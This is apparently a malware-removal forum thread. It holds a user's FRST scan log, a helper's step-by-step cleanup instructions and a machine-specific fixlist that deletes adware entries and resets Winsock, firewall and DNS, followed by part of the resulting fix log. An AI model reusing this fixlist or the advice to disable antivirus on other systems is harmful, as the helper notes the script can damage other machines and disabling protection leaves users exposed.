2013-06-07 05:16 - 2013-06-07 05:16 - 00019240 _____ () C:\Program Files (x86)\HP SimplePass\DownloadManager.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\Reprise:vnhwfkolvwxicefnplfh [0]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 07:25 - 2016-03-01 13:44 - 00000084 ____A C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1       localhost
0.0.0.1    mssplus.mcafee.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\levilaing\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\{9deef5e1-ccab-4b3d-bca1-455b50a6a967}.jpg
DNS Servers: 82.163.142.7 - 95.211.158.134
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run32: => "Price Finder"
HKLM\...\StartupApproved\Run32: => "ShopAtHomeUpdater"
HKLM\...\StartupApproved\Run32: => "ShopAtHomeWatcher"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKLM\...\StartupApproved\Run32: => "BCSSync"
HKLM\...\StartupApproved\Run32: => "CanonQuickMenu"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\StartupApproved\Run: => "BitTorrent"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\StartupApproved\Run: => "Power2GoExpress8"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\StartupApproved\Run: => "SearchProtection"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{B526A50D-0A4A-47AF-A3B1-18F21237DBCD}] => (Allow) C:\Users\levilaing\AppData\Local\Mozilla Firefox\firefox.exe
FirewallRules: [{258313C4-446C-4F80-A1C7-1AA672291888}] => (Allow) C:\Program Files (x86)\Max Driver Updater\maxdu.exe
FirewallRules: [{6D362581-2BEE-4B50-A798-8C1C721EFBFB}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{51A806B9-9B7C-4275-9EA0-581A00033A72}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{9C21B4E7-5A56-4E6F-A346-D89A430563D3}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDirector10\PDR10.EXE
FirewallRules: [{C0AF4038-CF12-491F-8961-B9239EE741A0}] => (Allow) C:\Users\levilaing\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{789CBDE5-8D93-45AD-9D41-B2E85FAEF763}] => (Allow) C:\Users\levilaing\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{3911963A-E07B-411B-B094-BF32F1533B97}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD10\PowerDVD10.EXE
FirewallRules: [{7F503151-B69D-404F-89E3-E44E2D72EAFE}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{8AF0A2D5-C73D-4CFE-B437-1776D167C64B}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{1CDAD930-81E3-4E65-940D-B569BCD30FFC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{C3BE03B9-7BCE-4AAE-8021-97FE4B1BA2D1}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [TCP Query User{6B8C3DDB-1C92-4AAE-9318-5E08D67AEBE7}C:\program files (x86)\hp\common\hpdevicedetection3.exe] => (Allow) C:\program files (x86)\hp\common\hpdevicedetection3.exe
FirewallRules: [UDP Query User{7493AB54-CF3E-43B9-8661-1A409ECB3FDC}C:\program files (x86)\hp\common\hpdevicedetection3.exe] => (Allow) C:\program files (x86)\hp\common\hpdevicedetection3.exe
FirewallRules: [TCP Query User{3A421C94-4882-4C5E-9ED8-6948A8F4423F}C:\users\levilaing\downloads\bittorrent.exe] => (Block) C:\users\levilaing\downloads\bittorrent.exe
FirewallRules: [UDP Query User{D30C2AD3-4E64-41E5-BA64-7B55FE47829D}C:\users\levilaing\downloads\bittorrent.exe] => (Block) C:\users\levilaing\downloads\bittorrent.exe
FirewallRules: [{BF72EB0A-F386-4B9B-856E-1E38298F4B42}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C0DE9C4E-50E0-49F5-A4A2-426F40D17394}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{721308D0-7918-4B76-8E8C-4C92E145C656}] => (Allow) LPort=2869
FirewallRules: [{6B0EBD56-A311-4A92-BFE3-518FD740BDCE}] => (Allow) LPort=1900
FirewallRules: [{64C1D218-9AD0-4580-AFC9-CABAF0C98A64}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

09-02-2016 13:53:15 Windows Update
01-03-2016 13:01:54 Windows Update
01-03-2016 13:02:55 Windows Update

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (03/07/2016 01:17:25 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 15625

Error: (03/07/2016 01:17:25 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 15625

Error: (03/07/2016 01:17:25 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (03/07/2016 01:17:19 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9140

Error: (03/07/2016 01:17:19 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9140

Error: (03/07/2016 01:17:19 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (03/04/2016 03:50:53 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 1109

Error: (03/04/2016 03:50:53 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 1109

Error: (03/04/2016 03:50:53 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (03/04/2016 03:29:56 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LEVISPC)
Description: Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: -2147023170 See the Microsoft-Windows-TWinUI/Operational log for additional information.


System errors:
=============
Error: (03/08/2016 12:28:01 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/08/2016 11:24:19 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/08/2016 09:16:52 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/07/2016 06:12:22 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/07/2016 05:31:28 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/07/2016 04:27:37 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/07/2016 01:17:02 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/07/2016 10:45:07 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/04/2016 03:50:29 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/04/2016 12:24:52 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable


CodeIntegrity:
===================================
  Date: 2016-03-01 13:39:04.692
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-02-15 11:48:03.432
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-02-09 21:20:12.135
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-28 15:09:07.207
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-19 20:04:09.326
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-12 14:52:54.813
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2016-01-06 07:51:33.186
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-12-31 10:57:24.742
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-12-28 11:47:23.759
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

  Date: 2015-12-24 11:09:17.839
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel® Core™ i5-3210M CPU @ 2.50GHz
Percentage of memory in use: 47%
Total physical RAM: 6033.27 MB
Available physical RAM: 3143.95 MB
Total Virtual: 6993.27 MB
Available Virtual: 3529.85 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:669.53 GB) (Free:596.48 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (RECOVERY) (Fixed) (Total:27.14 GB) (Free:3.16 GB) NTFS ==>[system with boot components (obtained from drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 5CA0CBD1)

Partition: GPT.

==================== End of Addition.txt ============================


  • 0

#5
pystryker

    Trusted Helper

  • Malware Removal
  • 3,886 posts
Hello :)

We have much to do, so let's get started. Please take your time following these instructions, as there's a lot to go through. :thumbsup:

Please disable your antivirus for the duration of my instructions. Don't forget to re-enable it after you have completed the steps.


Step 1: P2P Warning and Program Uninstalls


The Dangers of P2P Programs

I noticed that you have a P2P file sharing program on your computer. I cannot stress highly enough the danger in using these types of programs. P2P programs are one of the major avenues of infection these days. The files downloaded with these programs are more likely than not infected with trojans, malware, rootkits, etc.

You run the risk of getting an infection that can compromise your sensitive data, such as financial records, personal information, etc. That is just the infection aspect of using P2P programs. You also run the risk of possible arrest, fines, or in severe cases, jail time for illegal downloading of copyrighted material.

There are also new infections out there such as CryptoWall 3.0 and CryptoLocker. When infected with these, all of your personal files on any drive connected to your computer will be affected. These infections copy all your files, encrypt them, and then delete the originals, leaving you with the encrypted copies. You are then presented with a screen telling you that you have a certain amount of time to pay the ransom for the decryption code to decrypt your files. Even if you pay the ransom, their decryption process usually results in corrupt and unusable files.

There is nothing we can do to decrypt the files, as they use very sophisticated encryption techniques. Please consider this when using P2P programs. Malware and ransomware writers use P2P to spread their infections.


Here are some information sources about the dangers of P2P programs:

FBI - Peer to Peer Scams

USA Today Article on P2P Programs

File Sharing Infects 500,000 Computers

I very much recommend you uninstall this program from your machine. If not, I can guarantee you will be back needing help with your machine again. The risks of infections from content downloaded with P2P programs far outweigh any benefit of using them.

It is, of course, your choice as to whether or not you remove the program from your machine. It is my duty though, to point out how dangerous it is to use these programs. However, I must request that you do not use it while we are cleaning your machine.


Program Uninstalls

Please uninstall the following programs from your machine as they are adware/malware related. If one of the programs fails to uninstall, please move on to the next one in the list.
  • Desktop-play 000.015020180
  • PhraseProfessor
  • Setup

Step 2: Fix with FRST


Note: Before performing this step, please move FRST64.exe from C:\Users\levilaing\Downloads to the Desktop, or the fix will not work. All tools must be run from the Desktop.
  • Open notepad (Start => All Programs => Accessories => Notepad). Please copy the entire contents of the code box below. (To do this, highlight the contents of the box, right-click on it and select Copy.)
  • Right-click in the open notepad and select Paste.
  • Save it on the desktop as fixlist.txt

    NOTE: It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.

Start
CreateRestorePoint:
CloseProcesses:
() C:\Program Files\Phrase Professor191220150009\MolacAgafxi.exe
C:\Program Files\Phrase Professor191220150009
BHO: Phrase Professor191220150009 -> {45A8F68D-05A0-4573-8D3D-72E45371DEB8} -> C:\Program Files\Phrase Professor191220150009\Eiijanmy64.dll [2015-12-18] ()
BHO-x32: Phrase Professor191220150009 -> {45A8F68D-05A0-4573-8D3D-72E45371DEB8} -> C:\Program Files\Phrase Professor191220150009\Eiijanmy.dll [2015-12-18] ()
FF HKLM\...\Firefox\Extensions: [{45A8F68D-05A0-4573-8D3D-72E45371DEB8}] - C:\Program Files\Phrase Professor191220150009\Firefox\{45A8F68D-05A0-4573-8D3D-72E45371DEB8}.xpi
FF Extension: Phrase Professor191220150009 - C:\Program Files\Phrase Professor191220150009\Firefox\{45A8F68D-05A0-4573-8D3D-72E45371DEB8}.xpi [2015-12-18] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{45A8F68D-05A0-4573-8D3D-72E45371DEB8}] - C:\Program Files\Phrase Professor191220150009\Firefox\{45A8F68D-05A0-4573-8D3D-72E45371DEB8}.xpi
R2 OhufgaFyfves; C:\Program Files\Phrase Professor191220150009\MolacAgafxi.exe [178536 2015-12-18] ()
HKLM-x32\...\Run: [Price Finder] => C:\Program Files (x86)\Price Finder\PriceFinderHelper.exe [43088 2013-11-15] (MindSpark Interactive Network)
C:\Program Files (x86)\Price Finder
HKLM-x32\...\Run: [ShopAtHomeWatcher] => C:\Users\levilaing\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeWatcher.exe
HKLM-x32\...\Run: [ShopAtHomeUpdater] => C:\Users\levilaing\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeUpdater.exe
C:\Users\levilaing\AppData\Roaming\ShopAtHome
HKLM-x32\...\Run: [] => [X]
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://start.mysearchdial.com/?f=1&a=dsites0103&cd=2XzuyEtN2Y1L1Qzu0AtD0BtA0C0CyEzzzzyCzy0FyC0FyBtBtN0D0Tzu0SyByCyCtN1L2XzutBtFtBtFtCyDtFtCyCtAtCtN1L1CzutBtAtDtC1N1R&cr=594446785&ir=
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=dsites0103&cd=2XzuyEtN2Y1L1Qzu0AtD0BtA0C0CyEzzzzyCzy0FyC0FyBtBtN0D0Tzu0SyByCyCtN1L2XzutBtFtBtFtCyDtFtCyCtAtCtN1L1CzutBtAtDtC1N1R&cr=594446785&ir=
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=dsites0103&cd=2XzuyEtN2Y1L1Qzu0AtD0BtA0C0CyEzzzzyCzy0FyC0FyBtBtN0D0Tzu0SyByCyCtN1L2XzutBtFtBtFtCyDtFtCyCtAtCtN1L1CzutBtAtDtC1N1R&cr=594446785&ir=
SearchScopes: HKLM-x32 -> {5a1d0d31-749c-4186-a295-4106e6e7b26a} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^AFA^xdm318^YYA^us&si=7cq-b&ptb=BCFD409C-284D-4B07-9DD5-707EAD598BA7&ind=2013111513&n=77fda4d9&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> {5a1d0d31-749c-4186-a295-4106e6e7b26a} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^AFA^xdm318^YYA^us&si=7cq-b&ptb=BCFD409C-284D-4B07-9DD5-707EAD598BA7&ind=2013111513&n=77fda4d9&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://nortonsafe.search.ask.com/web?q={SEARCHTERMS}&o=APN10506&l=dis&prt=NS&chn=oem&geo=US&ver=22&locale=en_US&gct=kwd&qsrc=2869
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> {cf34d395-9ff1-49a0-98a5-8db1636431b1} URL = hxxp://houmpage.com/search/?src=ds&q={searchTerms}&ssid=1450481507&a=1024151&uuid=7e89bdc6-7099-4da4-a7cc-3fa3a69a6cef
Toolbar: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - No File
FF NewTab: hxxp://www-searching.com/?site=shyosffdefault&prd=set_ff&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,
FF Plugin-x32: @CouponXplorer_5z.com/Plugin -> C:\Program Files (x86)\CouponXplorer_5z\bar\1.bin\NP5zStub.dll [2013-11-15] (MindSpark)
FF Plugin HKU\S-1-5-21-1018505005-2824899964-3694806622-1001: tdameritrade.com/thinkorswim -> C:\Program Files (x86)\thinkorswim\npthinkorswim.dll [No File]
FF Plugin HKU\S-1-5-21-1018505005-2824899964-3694806622-1001: tdameritrade.com/tossc -> C:\Program Files (x86)\thinkorswim\nptossc.dll [No File]
FF user.js: detected! => C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\user.js [2015-12-18]
CHR HomePage: Default -> hxxp://www-searching.com/?pid=s&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,&vp=ch&prd=set_ch
CHR StartupUrls: Default -> "hxxp://www-searching.com/?pid=s&s=FCIztutbl11,6716c22f-1031-4942-a662-741aed4da972,&vp=ch&prd=set_ch"
S2 EraserSvc11511; "C:\Program Files (x86)\Norton Security\Engine\22.5.4.24\NS.exe" /h ccCommon [X]
Task: {0233CBA7-CF8D-47C8-AAE0-15C5520BF73A} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {37FDB4B4-6F58-489C-8711-7C16755A4F51} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {49AB09C4-19DF-4844-B998-467FA3B28176} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {52A76F52-D07F-4BA4-BBA5-AEFB8BDDE6A6} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {8320D12B-9A3D-426A-BE5D-C9473998057E} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {8ED39B48-87B2-45B8-9B4A-7E3A4A3DEF49} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {926DF571-83F8-4B67-B099-E0CDE2A8E9B0} - \DNSKALAMAZOO -> No File <==== ATTENTION
Task: {96B45D1F-D133-4A3A-95CD-6BF63DBC0718} - System32\Tasks\Digital Sites => C:\Users\LEVILA~1\AppData\Roaming\DIGITA~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: {9D71B00E-3092-4BC0-8F6B-D6DA41E8DC2F} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {B0286D41-AF85-4532-AD16-2B5402FE5DE7} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {DD03D11B-03BD-4AD8-A57F-49D7F5FBD8A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {F4362C16-5DD8-45CC-BFF8-0DE20551FD7B} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {FC1EC4B9-E68E-48D4-B596-73DA09BA7009} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\Digital Sites.job => C:\Users\LEVILA~1\AppData\Roaming\DIGITA~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Reprise:vnhwfkolvwxicefnplfh [0]
Winsock: Catalog9-x64 01 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 02 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 03 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 04 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
Winsock: Catalog9-x64 05 C:\WINDOWS\system32\Qacsauol64.dll [375144 2015-12-18] ()
CMD: netsh winsock reset catalog
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
CMD: ipconfig /flushdns
Emptytemp:
End


NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.


Run FRST and press the Fix button just once and wait. The tool will make a log on the desktop (Fixlog.txt); please post it in your next reply.


Step 3: Junkware Removal Tool

Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
Step 4: AdwCleaner

Download AdwCleaner by clicking here. Please save it to your Desktop.

  • Double click (Vista and 7 users: right click) the adwcleaner.exe file, click Run as Administrator, and accept the UAC prompt to run AdwCleaner.
  • Once AdwCleaner's control panel is open and it says "Waiting for Action", click on Options at the top of the control panel.
  • Please check the following options:
    • Reset Proxy Settings
    • Reset Winsock Settings
    • Reset TCP/IP Settings
    • Reset Firewall Settings
    • Reset IPSec Settings
    • Reset BITS Queue
    • Reset Internet Explorer Policies
    • Reset Chrome Policies
  • Close any open windows or browsers.
  • Pause your Anti-Virus program if it is running.
  • Once it starts, click on the Scan button.
  • Let the scan complete itself. This may take a few minutes.
  • Once the scan has finished, it will say "Pending, uncheck elements you don't want to remove." Don't worry about unchecking anything, and then click the Cleaning button. When finished, it will ask to reboot. Please reboot.
  • When the machine has rebooted, a log will be produced. Please copy/paste that in your next reply. Here's how:
    • Click the Logfile button and the log will open. Copy and Paste the contents of the log file into your next reply.
    This report is also saved at C:\Program Files
Step 5: Fresh FRST Scan
  • Start Farbar's Recovery Scan Tool and press the Scan button.
  • FRST will scan your system and produce two logs: FRST.txt and Addition.txt. Please post them in your next reply.
Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

Fixlog.txt Log

Junkware Removal Tool Log

AdwCleaner Log

Fresh FRST.txt Log

Fresh Addition.txt Log

#6
LLL31

  • Topic Starter
  • Member
  • 15 posts

I have completed the initial fix but am unable to download the two programs. Every time I click on the links to the downloads my computer grinds to a halt and numerous ads pop up and Firefox is (not responding). Here is the fix log. I also deleted Phrase Professor and Desktop play.

Fix result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by levilaing (2016-03-09 16:45:13) Run:1
Running from C:\Users\levilaing\Desktop
Loaded Profiles: levilaing (Available Profiles: levilaing)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
CreateRestorePoint:
CloseProcesses:
() C:\Program Files\Phrase Professor191220150009\MolacAgafxi.exe
C:\Program Files\Phrase Professor191220150009
BHO: Phrase Professor191220150009 -> {45A8F68D-05A0-4573-8D3D-72E45371DEB8} -> C:\Program Files\Phrase Professor191220150009\Eiijanmy64.dll [2015-12-18] ()
BHO-x32: Phrase Professor191220150009 -> {45A8F68D-05A0-4573-8D3D-72E45371DEB8} -> C:\Program Files\Phrase Professor191220150009\Eiijanmy.dll [2015-12-18] ()
FF HKLM\...\Firefox\Extensions: [{45A8F68D-05A0-4573-8D3D-72E45371DEB8}] - C:\Program Files\Phrase Professor191220150009\Firefox\{45A8F68D-05A0-4573-8D3D-72E45371DEB8}.xpi
FF Extension: Phrase Professor191220150009 - C:\Program Files\Phrase Professor191220150009\Firefox\{45A8F68D-05A0-4573-8D3D-72E45371DEB8}.xpi [2015-12-18] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{45A8F68D-05A0-4573-8D3D-72E45371DEB8}] - C:\Program Files\Phrase Professor191220150009\Firefox\{45A8F68D-05A0-4573-8D3D-72E45371DEB8}.xpi
R2 OhufgaFyfves; C:\Program Files\Phrase Professor191220150009\MolacAgafxi.exe [178536 2015-12-18] ()
HKLM-x32\...\Run: [Price Finder] => C:\Program Files (x86)\Price Finder\PriceFinderHelper.exe [43088 2013-11-15] (MindSpark Interactive Network)
C:\Program Files (x86)\Price Finder
HKLM-x32\...\Run: [ShopAtHomeWatcher] => C:\Users\levilaing\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeWatcher.exe
HKLM-x32\...\Run: [ShopAtHomeUpdater] => C:\Users\levilaing\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeUpdater.exe
C:\Users\levilaing\AppData\Roaming\ShopAtHome
HKLM-x32\...\Run: [] => [X]
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://start.mysearchdial.com/?f=1&a=dsites0103&cd=2XzuyEtN2Y1L1Qzu0AtD0BtA0C0CyEzzzzyCzy0FyC0FyBtBtN0D0Tzu0SyByCyCtN1L2XzutBtFtBtFtCyDtFtCyCtAtCtN1L1CzutBtAtDtC1N1R&cr=594446785&ir=
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=dsites0103&cd=2XzuyEtN2Y1L1Qzu0AtD0BtA0C0CyEzzzzyCzy0FyC0FyBtBtN0D0Tzu0SyByCyCtN1L2XzutBtFtBtFtCyDtFtCyCtAtCtN1L1CzutBtAtDtC1N1R&cr=594446785&ir=
